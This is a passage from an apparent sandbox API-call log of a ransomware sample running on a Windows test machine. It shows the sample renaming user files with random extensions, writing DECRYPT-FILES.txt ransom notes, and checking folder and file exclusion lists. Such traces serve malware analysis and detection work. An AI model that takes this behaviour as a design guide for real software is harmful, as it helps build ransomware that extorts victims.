lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.188] lstrlenA (lpString="DELETEATOM") returned 10 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.188] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.188] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.188] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.188] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.188] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.188] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.189] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.189] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.189] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.189] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.189] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.189] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.189] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.189] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.189] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.189] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.189] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.189] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.189] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.189] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.189] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.189] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.189] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.189] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.189] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.190] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.190] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.190] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.190] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.190] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.190] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.190] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.190] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.190] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.190] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.190] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.190] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.190] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.190] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.190] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.190] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.190] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.190] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.191] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.191] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 75 [0078.191] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.nT3uZr") returned 82 [0078.191] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.nT3uZr" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml.nt3uzr"), dwFlags=0x0) returned 1 [0078.193] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.193] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.193] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.193] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6215c440, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x6215c440, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6215c440, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x9a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.xml", cAlternateFileName="")) returned 0 [0078.193] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0078.193] CloseHandle (hObject=0x448) returned 1 [0078.194] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33c0ebb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x33c0ebb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x33c0ebb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPoint", cAlternateFileName="POWERP~1")) returned 1 [0078.194] lstrcmpW (lpString1="PowerPoint", lpString2=".") returned 1 [0078.194] lstrcmpW (lpString1="PowerPoint", lpString2="..") returned 1 [0078.194] lstrcatW (in: lpString1="PowerPoint", lpString2="\\" | out: lpString1="PowerPoint\\") returned="PowerPoint\\" [0078.194] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="PowerPoint\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\" [0078.194] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\Program Files") returned 0x0 [0078.194] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch=":\\Windows") returned 0x0 [0078.194] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\Games\\") returned 0x0 [0078.194] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.194] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.194] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.194] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.194] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.194] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\All Users") returned 0x0 [0078.194] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.194] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.194] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.194] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="AhnLab") returned 0x0 [0078.194] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.194] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned 67 [0078.194] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.194] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\\\jkbimi8.tmp") returned 79 [0078.194] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\powerpoint\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0078.196] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned 67 [0078.196] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.196] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\\\DECRYPT-FILES.txt") returned 85 [0078.196] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\powerpoint\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0078.196] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0078.197] CloseHandle (hObject=0x44c) returned 1 [0078.197] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned 67 [0078.197] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*" [0078.197] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33c0ebb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaacd35e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacd35e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0078.198] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.198] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33c0ebb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaacd35e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacd35e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.198] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.198] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.198] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacd35e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaacd35e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacd35e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.198] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.198] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacd35e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaacd35e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacd35e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.198] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.198] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.198] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.198] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.198] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.198] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.198] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.198] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.198] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.198] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.198] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.198] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.198] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.198] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.198] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.198] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned 67 [0078.198] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.198] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\" [0078.198] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\jkbimi8.tmp" [0078.198] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.199] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\powerpoint\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.199] CloseHandle (hObject=0x0) returned 0 [0078.199] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.199] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacd35e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaacd35e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacd35e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0078.199] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0078.199] CloseHandle (hObject=0x448) returned 1 [0078.200] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x510b16f0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x510b16f0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x510b16f0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof", cAlternateFileName="")) returned 1 [0078.200] lstrcmpW (lpString1="Proof", lpString2=".") returned 1 [0078.200] lstrcmpW (lpString1="Proof", lpString2="..") returned 1 [0078.200] lstrcatW (in: lpString1="Proof", lpString2="\\" | out: lpString1="Proof\\") returned="Proof\\" [0078.200] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Proof\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\" [0078.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\Program Files") returned 0x0 [0078.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch=":\\Windows") returned 0x0 [0078.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\Games\\") returned 0x0 [0078.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\All Users") returned 0x0 [0078.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\AppData\\Local") returned 0x0 